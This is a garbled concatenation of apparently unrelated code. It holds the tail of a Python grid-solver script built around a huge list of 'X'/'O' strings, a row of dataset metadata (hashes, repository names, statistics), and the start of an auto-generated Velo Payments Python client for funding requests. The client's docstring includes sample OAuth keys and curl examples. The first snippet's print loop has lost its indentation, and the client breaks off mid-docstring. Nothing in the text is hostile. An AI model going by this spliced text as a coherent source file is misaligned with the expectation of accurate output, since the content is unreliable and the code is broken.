XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO"]))
s.solve(board)
for r in board:
print(r) | 743.579545 | 63,276 | 0.969603 | 550 | 65,435 | 115.341818 | 0.169091 | 0.496548 | 0.732999 | 0.977332 | 0.987295 | 0.987295 | 0.987247 | 0.987247 | 0.987247 | 0.985923 | 0 | 0.000543 | 0.014518 | 65,435 | 88 | 63,277 | 743.579545 | 0.983221 | 0.007213 | 0 | 0.176471 | 0 | 0 | 0.962818 | 0.962279 | 0 | 1 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.039216 | 0 | 0.098039 | 0.078431 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 |
c33e3b07a05ed47354702669364dbab1748e984f | 112,940 | py | Python | velo_payments/api/funding_manager_api.py | velopaymentsapi/velo-python | 59b39555e9714139b4bf697151cc7d15f6dd510e | [
"Apache-2.0"
] | null | null | null | velo_payments/api/funding_manager_api.py | velopaymentsapi/velo-python | 59b39555e9714139b4bf697151cc7d15f6dd510e | [
"Apache-2.0"
] | null | null | null | velo_payments/api/funding_manager_api.py | velopaymentsapi/velo-python | 59b39555e9714139b4bf697151cc7d15f6dd510e | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Velo Payments APIs
## Terms and Definitions Throughout this document and the Velo platform the following terms are used: * **Payor.** An entity (typically a corporation) which wishes to pay funds to one or more payees via a payout. * **Payee.** The recipient of funds paid out by a payor. * **Payment.** A single transfer of funds from a payor to a payee. * **Payout.** A batch of Payments, typically used by a payor to logically group payments (e.g. by business day). Technically there need be no relationship between the payments in a payout - a single payout can contain payments to multiple payees and/or multiple payments to a single payee. * **Sandbox.** An integration environment provided by Velo Payments which offers a similar API experience to the production environment, but all funding and payment events are simulated, along with many other services such as OFAC sanctions list checking. ## Overview The Velo Payments API allows a payor to perform a number of operations. The following is a list of the main capabilities in a natural order of execution: * Authenticate with the Velo platform * Maintain a collection of payees * Query the payor’s current balance of funds within the platform and perform additional funding * Issue payments to payees * Query the platform for a history of those payments This document describes the main concepts and APIs required to get up and running with the Velo Payments platform. It is not an exhaustive API reference. For that, please see the separate Velo Payments API Reference. ## API Considerations The Velo Payments API is REST based and uses the JSON format for requests and responses. Most calls are secured using OAuth 2 security and require a valid authentication access token for successful operation. See the Authentication section for details. Where a dynamic value is required in the examples below, the {token} format is used, suggesting that the caller needs to supply the appropriate value of the token in question (without including the { or } characters). Where curl examples are given, the –d @filename.json approach is used, indicating that the request body should be placed into a file named filename.json in the current directory. Each of the curl examples in this document should be considered a single line on the command-line, regardless of how they appear in print. ## Authenticating with the Velo Platform Once Velo backoffice staff have added your organization as a payor within the Velo platform sandbox, they will create you a payor Id, an API key and an API secret and share these with you in a secure manner. You will need to use these values to authenticate with the Velo platform in order to gain access to the APIs. The steps to take are explained in the following: create a string comprising the API key (e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8) and API secret (e.g. c396b26b-137a-44fd-87f5-34631f8fd529) with a colon between them. E.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8:c396b26b-137a-44fd-87f5-34631f8fd529 base64 encode this string. E.g.: NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== create an HTTP **Authorization** header with the value set to e.g. Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== perform the Velo authentication REST call using the HTTP header created above e.g. via curl: ``` curl -X POST \\ -H \"Content-Type: application/json\" \\ -H \"Authorization: Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ==\" \\ 'https://api.sandbox.velopayments.com/v1/authenticate?grant_type=client_credentials' ``` If successful, this call will result in a **200** HTTP status code and a response body such as: ``` { \"access_token\":\"19f6bafd-93fd-4747-b229-00507bbc991f\", \"token_type\":\"bearer\", \"expires_in\":1799, \"scope\":\"...\" } ``` ## API access following authentication Following successful authentication, the value of the access_token field in the response (indicated in green above) should then be presented with all subsequent API calls to allow the Velo platform to validate that the caller is authenticated. This is achieved by setting the HTTP Authorization header with the value set to e.g. Bearer 19f6bafd-93fd-4747-b229-00507bbc991f such as the curl example below: ``` -H \"Authorization: Bearer 19f6bafd-93fd-4747-b229-00507bbc991f \" ``` If you make other Velo API calls which require authorization but the Authorization header is missing or invalid then you will get a **401** HTTP status response. # noqa: E501
The version of the OpenAPI document: 2.26.124
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from velo_payments.api_client import ApiClient
from velo_payments.exceptions import (
ApiTypeError,
ApiValueError
)
class FundingManagerApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_ach_funding_request(self, source_account_id, funding_request_v1, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ach_funding_request(source_account_id, funding_request_v1, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV1 funding_request_v1: Body to included amount to be funded (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_ach_funding_request_with_http_info(source_account_id, funding_request_v1, **kwargs) # noqa: E501
def create_ach_funding_request_with_http_info(self, source_account_id, funding_request_v1, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ach_funding_request_with_http_info(source_account_id, funding_request_v1, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV1 funding_request_v1: Body to included amount to be funded (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'funding_request_v1'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_ach_funding_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `create_ach_funding_request`") # noqa: E501
# verify the required parameter 'funding_request_v1' is set
if ('funding_request_v1' not in local_var_params or
local_var_params['funding_request_v1'] is None):
raise ApiValueError("Missing the required parameter `funding_request_v1` when calling `create_ach_funding_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'funding_request_v1' in local_var_params:
body_params = local_var_params['funding_request_v1']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts/{sourceAccountId}/achFundingRequest', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_funding_request(self, source_account_id, funding_request_v2, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request(source_account_id, funding_request_v2, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV2 funding_request_v2: Body to included amount to be funded (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_funding_request_with_http_info(source_account_id, funding_request_v2, **kwargs) # noqa: E501
def create_funding_request_with_http_info(self, source_account_id, funding_request_v2, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request_with_http_info(source_account_id, funding_request_v2, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV2 funding_request_v2: Body to included amount to be funded (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
